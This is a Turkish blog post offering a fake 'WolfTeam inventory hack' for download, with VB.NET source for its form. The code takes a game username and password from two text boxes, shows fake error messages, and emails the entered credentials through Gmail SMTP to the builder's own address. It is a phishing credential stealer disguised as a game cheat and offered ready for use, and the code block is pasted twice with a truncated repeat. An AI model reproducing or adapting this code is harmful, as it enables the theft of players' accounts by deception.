WolfTeam Envanter Hack Fake
Resimler
2.
3.
4.
5.
Download:Dosya.tc - cretsiz, Hzl ve Kolay Dosya PaylamDosya.tc - cretsiz, Hzl ve Kolay Dosya Paylam
Alternatif:https://rapidshare.com/files/3634022...ProTurkish.rar
Fake Kod:
Public Class Form3'un Üstüne Yazılacak Kod:
Imports System.Net.Mail
Imports System.Net.Mail
Buton Kodu;
If TextBox1.Text = "" Then
MsgBox("Kullanıcı Adı Yanlış")
If TextBox2.Text = "" Then
MsgBox("Şifre Yanlış")
Else
End If
End If
Dim smtpServer As New SmtpClient()
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("Kendi Gmail Adresin", "Gmail Şifren")
'using gmail
smtpServer.Port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("Gmail Adresin")
mail.To.Add("Gmail Adresin")
mail.Subject = "Username : " & TextBox1.Text
mail.Body = "Password : " & TextBox2.Text & ","
smtpServer.Send(mail)
MsgBox("Burayada Butona Basıldıktan Sonra Ekranda Çıkacak Yazı")
MsgBox("Burada Üsttekiyle Aynı")
2Adet Text Box Eklemeyi Unutmayınız
MsgBox("Kullanıcı Adı Yanlış")
If TextBox2.Text = "" Then
MsgBox("Şifre Yanlış")
Else
End If
End If
Dim smtpServer As New SmtpClient()
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("Kendi Gmail Adresin", "Gmail Şifren")
'using gmail
smtpServer.Port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("Gmail Adresin")
mail.To.Add("Gmail Adresin")
mail.Subject = "Username : " & TextBox1.Text
mail.Body = "Password : " & TextBox2.Text & ","
smtpServer.Send(mail)
MsgBox("Burayada Butona Basıldıktan Sonra Ekranda Çıkacak Yazı")
MsgBox("Burada Üsttekiyle Aynı")
2Adet Text Box Eklemeyi Unutmayınız
0 yorum:
Yorum Gönder